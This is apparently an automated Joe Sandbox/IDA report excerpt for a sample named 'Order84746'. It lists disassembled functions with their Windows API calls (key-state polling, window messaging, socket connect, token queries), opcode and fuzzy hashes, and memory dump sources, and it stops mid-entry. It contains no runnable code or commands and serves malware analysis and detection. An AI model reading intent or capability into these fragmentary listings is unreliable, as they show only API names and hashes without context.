                          • API String ID: 1389676194-0
                          • Opcode ID: e0e6c53f59b4146e7509a020ae53dbb56e69962b7ed7648c2537e2b96014686c
                          • Instruction ID: 93479cacd8439cbd601b1d8511a3716183458c7e88ecfe55fd27cba26c1995e6
                          • Opcode Fuzzy Hash: e0e6c53f59b4146e7509a020ae53dbb56e69962b7ed7648c2537e2b96014686c
                          • Instruction Fuzzy Hash: 0C411C35A00149DFCB01EF69C9919AEBBF5FF09310B148099E95AAB362CB71ED01DF51
                          APIs
                          • GetCursorPos.USER32(000000FF), ref: 008FB64F
                          • ScreenToClient.USER32(00000000,000000FF), ref: 008FB66C
                          • GetAsyncKeyState.USER32(00000001), ref: 008FB691
                          • GetAsyncKeyState.USER32(00000002), ref: 008FB69F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorScreen
                          • String ID:
                          • API String ID: 4210589936-0
                          • Opcode ID: 50cc27c1c45033083e4e5fd4fe879d8bf1fad8fea0a44264f5a06207d5492a48
                          • Instruction ID: e9fb0e30560f2598ded89a3b0470640a5eafd41a343588ae188baa1cb6fb7b0e
                          • Opcode Fuzzy Hash: 50cc27c1c45033083e4e5fd4fe879d8bf1fad8fea0a44264f5a06207d5492a48
                          • Instruction Fuzzy Hash: B3415C31A08119FBDF19DF65CC44AE9BBB4FB19325F204219F829D6290CB34AD94DB91
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 0091B369
                          • PostMessageW.USER32(?,00000201,00000001), ref: 0091B413
                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0091B41B
                          • PostMessageW.USER32(?,00000202,00000000), ref: 0091B429
                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0091B431
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessagePostSleep$RectWindow
                          • String ID:
                          • API String ID: 3382505437-0
                          • Opcode ID: fcc992a945fdbefac0836aab632eb6d879e0fdc471da373be6d257756ed76f2e
                          • Instruction ID: d40559137b7db08164410e37e2c2f5b7068e9254e01048e79f16693e5e2c571d
                          • Opcode Fuzzy Hash: fcc992a945fdbefac0836aab632eb6d879e0fdc471da373be6d257756ed76f2e
                          • Instruction Fuzzy Hash: BC31EE71A0521DEBDF04CF68DD4CADE3BBAEB04315F008229F931AA1D1C3B099A1DB90
                          APIs
                          • IsWindowVisible.USER32(?), ref: 0091DBD7
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0091DBF4
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0091DC2C
                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0091DC52
                          • _wcsstr.LIBCMT ref: 0091DC5C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                          • String ID:
                          • API String ID: 3902887630-0
                          • Opcode ID: 6297d7bef8ddb2a249827a0421c77ee53564386024bd55e8843c15f8ca5a86cd
                          • Instruction ID: 967dd64a0dc8707b4e72e4a751ec0daa846b9c8db30b785978813a32939df12c
                          • Opcode Fuzzy Hash: 6297d7bef8ddb2a249827a0421c77ee53564386024bd55e8843c15f8ca5a86cd
                          • Instruction Fuzzy Hash: B1214931309108BBEB155F39DD49EBB7BACEF45710F104439F909CA091EAA1CC80D2A0
                          APIs
                            • Part of subcall function 008E50E6: _wcsncpy.LIBCMT ref: 008E50FA
                          • GetFileAttributesW.KERNEL32(?,?,?,?,009260C3), ref: 00926369
                          • GetLastError.KERNEL32(?,?,?,009260C3), ref: 00926374
                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009260C3), ref: 00926388
                          • _wcsrchr.LIBCMT ref: 009263AA
                            • Part of subcall function 00926318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009260C3), ref: 009263E0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                          • String ID:
                          • API String ID: 3633006590-0
                          • Opcode ID: 32c0ca2180790d930ca53e9aac6f341388c74f7c9656f1caea52e12a6dec5487
                          • Instruction ID: b3690e8739f45eb1b32717464f85af0ea22f115e4e5f6f1bddb23e6ceb5019b4
                          • Opcode Fuzzy Hash: 32c0ca2180790d930ca53e9aac6f341388c74f7c9656f1caea52e12a6dec5487
                          • Instruction Fuzzy Hash: 7A210831A152258ADB25EB78BC52FEA33ACFF163A0F100469F155C34C9EBA4D9809A65
                          APIs
                            • Part of subcall function 0093A82C: inet_addr.WS2_32(00000000), ref: 0093A84E
                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00938BD3
                          • WSAGetLastError.WS2_32(00000000), ref: 00938BE2
                          • connect.WS2_32(00000000,?,00000010), ref: 00938BFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorLastconnectinet_addrsocket
                          • String ID:
                          • API String ID: 3701255441-0
                          • Opcode ID: 28b7b65e1aa80fed08480152fbfb09c435ee157c77f02165c5993d513dd984cd
                          • Instruction ID: d0c88745be27fa092dae4e4e41797492d679e43894254f4bb8303f89f6259c8c
                          • Opcode Fuzzy Hash: 28b7b65e1aa80fed08480152fbfb09c435ee157c77f02165c5993d513dd984cd
                          • Instruction Fuzzy Hash: FA218E717002149FCB10AF68D985B7E77A9EF48710F044459FA56EB2D2CBB4A8019B62
                          APIs
                          • IsWindow.USER32(00000000), ref: 00938441
                          • GetForegroundWindow.USER32 ref: 00938458
                          • GetDC.USER32(00000000), ref: 00938494
                          • GetPixel.GDI32(00000000,?,00000003), ref: 009384A0
                          • ReleaseDC.USER32(00000000,00000003), ref: 009384DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$ForegroundPixelRelease
                          • String ID:
                          • API String ID: 4156661090-0
                          • Opcode ID: 9d2b6fd15d81d2afc3d6f5fb201cf5e14838c3fc46e45e90f003ec7ab78e1c48
                          • Instruction ID: 5d698032c4c4e91b096d59ba4be815842f6497b0e00c8dd3173d18991d7ed564
                          • Opcode Fuzzy Hash: 9d2b6fd15d81d2afc3d6f5fb201cf5e14838c3fc46e45e90f003ec7ab78e1c48
                          • Instruction Fuzzy Hash: 3E218176B00204AFD700DFA5DD89AAEBBE5EF48301F048479F95AD7251DB70AC04DB60
                          APIs
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 008FAFE3
                          • SelectObject.GDI32(?,00000000), ref: 008FAFF2
                          • BeginPath.GDI32(?), ref: 008FB009
                          • SelectObject.GDI32(?,00000000), ref: 008FB033
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: a2bbbd15867120026c478d543da1d955743d02d951c3d6a3cd4e388fe40143ca
                          • Instruction ID: f95f4d448e4735dad4c1faa9f989d2d588e4c1ba04be65dad471b2ed8b3ba00c
                          • Opcode Fuzzy Hash: a2bbbd15867120026c478d543da1d955743d02d951c3d6a3cd4e388fe40143ca
                          • Instruction Fuzzy Hash: D621A1B0928609EFDB14DF65EC447AA7B68FB123A9F18421AF524D60E0C7B04945EBD1
                          APIs
                          • __calloc_crt.LIBCMT ref: 009021A9
                          • CreateThread.KERNEL32(?,?,009022DF,00000000,?,?), ref: 009021ED
                          • GetLastError.KERNEL32 ref: 009021F7
                          • _free.LIBCMT ref: 00902200
                          • __dosmaperr.LIBCMT ref: 0090220B
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                          • String ID:
                          • API String ID: 2664167353-0
                          • Opcode ID: a3391631dbcd0d3380fbe607b278fd93608709044e382eca4ca6a4bef946bcd5
                          • Instruction ID: 7327d43a87155dce9ec8d72b63f3b9ff792f29fb69a5ab74b2e55866f989f388
                          • Opcode Fuzzy Hash: a3391631dbcd0d3380fbe607b278fd93608709044e382eca4ca6a4bef946bcd5
                          • Instruction Fuzzy Hash: 76112633608346AFEB15AFE9DC45EAB7B9CEF85770B100429F928C61C1EB71D81187A0
                          APIs
                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0091ABD7
                          • GetLastError.KERNEL32(?,0091A69F,?,?,?), ref: 0091ABE1
                          • GetProcessHeap.KERNEL32(00000008,?,?,0091A69F,?,?,?), ref: 0091ABF0
                          • RtlAllocateHeap.NTDLL(00000000,?,0091A69F), ref: 0091ABF7
                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0091AC0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 883493501-0
                          • Opcode ID: b45863706e4da023ef587f8e02248851d173cf353327f14f74599819fa3502bf
                          • Instruction ID: 442a8cd5b37426e216e981a78fc51fb402a3cdcc3d5ce9787ca7a9a01c8519a1
                          • Opcode Fuzzy Hash: b45863706e4da023ef587f8e02248851d173cf353327f14f74599819fa3502bf
                          • Instruction Fuzzy Hash: BB018C70716209BFDB104FAADC48DAB3BACEF8A354710042DF856C3260DAB1CC80DBA0
                          APIs
                          • CLSIDFromProgID.COMBASE ref: 00919ADC
                          • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00919AF7
                          • lstrcmpiW.KERNEL32(?,00000000), ref: 00919B05
                          • CoTaskMemFree.COMBASE(00000000), ref: 00919B15
                          • CLSIDFromString.COMBASE(?,?), ref: 00919B21
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: From$Prog$FreeStringTasklstrcmpi
                          • String ID:
                          • API String ID: 3897988419-0
                          • Opcode ID: b008c5f8549343f9cde8a0545110990f07d9402cdc17e30ca4522a8b4c60929b
                          • Instruction ID: 867be40207ce9d29fa1d03f9494264c40f2a6a8859cc0679417ffc1924fbed81
                          • Opcode Fuzzy Hash: b008c5f8549343f9cde8a0545110990f07d9402cdc17e30ca4522a8b4c60929b
                          • Instruction Fuzzy Hash: 1A018F76B15209BFDB104F54EC58B9A7AEDEF48395F144028F905D3210D7B0DD80ABA0
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00927A74
                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00927A82
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00927A8A
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00927A94
                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00927AD0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          • Opcode ID: cf0ec771f75ab3312f9e4545f3e5f1983f3c1105fa6195e75725ea63f94de945
                          • Instruction ID: d2acef008b71915d2aef8f71c524439130a0646c83ea63a1155a9bf69ee1af52
                          • Opcode Fuzzy Hash: cf0ec771f75ab3312f9e4545f3e5f1983f3c1105fa6195e75725ea63f94de945
                          • Instruction Fuzzy Hash: AC016931D0A629EBDF04AFE5EC49ADDFB78FB09321F01044AE512B2154DB7096509BA1
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0091AADA
                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0091AAE4
                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0091AAF3
                          • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0091AAFA
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0091AB10
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 47921759-0
                          • Opcode ID: 53a5a241ed957a0396a04a74147c0d7549d08315f24cfdabab94c751e206e137
                          • Instruction ID: d2f594f080f301bce7500ff44ad049af96a2727ac37a427e450ccf573fec3940
                          • Opcode Fuzzy Hash: 53a5a241ed957a0396a04a74147c0d7549d08315f24cfdabab94c751e206e137
                          • Instruction Fuzzy Hash: B2F0627175A2486FEB111FA5FC88EA73BADFF4A754F00002DF952C7190CAA19C45DB61
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0091AA79
                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0091AA83
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0091AA92
                          • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0091AA99
                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0091AAAF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 47921759-0
                          • Opcode ID: 3af4b2715a54b18184a7ce6ffebdee3357ca55fcf38703cd33dd2fea361009ad
                          • Instruction ID: 036c58bedcb094edb5728f5ab044e8ba7b896b7d3314fbb1fbcc2707f3576d6c
                          • Opcode Fuzzy Hash: 3af4b2715a54b18184a7ce6ffebdee3357ca55fcf38703cd33dd2fea361009ad
                          • Instruction Fuzzy Hash: 57F0AF3131A2086FEB101FA5AC88EB73BADFF4A754F00001DF911C7190DAA19C41DA61
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 0091EC94
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0091ECAB
                          • MessageBeep.USER32(00000000), ref: 0091ECC3
                          • KillTimer.USER32(?,0000040A), ref: 0091ECDF
                          • EndDialog.USER32(?,00000001), ref: 0091ECF9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: b91110096f0c6ff25a74d8e9c97c5c058ebc81c5bf48be3e6aea1bcb81de59c3
                          • Instruction ID: c99f94b8fe270e28f4f60961d74eb976116ba75d943ac381d4b0cc43298542bd
                          • Opcode Fuzzy Hash: b91110096f0c6ff25a74d8e9c97c5c058ebc81c5bf48be3e6aea1bcb81de59c3
                          • Instruction Fuzzy Hash: 1E016D30A14719ABEB245B10DE4EBD67BB8FB10705F00055DF9A3A14E0DBF4AA849BC1
                          APIs
                          • EndPath.GDI32(?), ref: 008FB0BA
                          • StrokeAndFillPath.GDI32(?,?,0095E680,00000000,?,?,?), ref: 008FB0D6
                          • SelectObject.GDI32(?,00000000), ref: 008FB0E9
                          • DeleteObject.GDI32 ref: 008FB0FC
                          • StrokePath.GDI32(?), ref: 008FB117
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          • Opcode ID: 43f730b8b04f19c6c3b804df3495bfc25ee87c9f395f8243fc5be1953faae23c
                          • Instruction ID: c89ed6f311e93267adefc9be896f2003581d7c369d28d17f9a4c4e1e64ddb981
                          • Opcode Fuzzy Hash: 43f730b8b04f19c6c3b804df3495bfc25ee87c9f395f8243fc5be1953faae23c
                          • Instruction Fuzzy Hash: A7F01934129648EFCB219F65EC0C7643B64FB123A6F088318E525C40F0CB7089A6EF90
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0092F2DA
                          • CoCreateInstance.COMBASE(0096DA7C,00000000,00000001,0096D8EC,?), ref: 0092F2F2
                          • CoUninitialize.COMBASE ref: 0092F555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
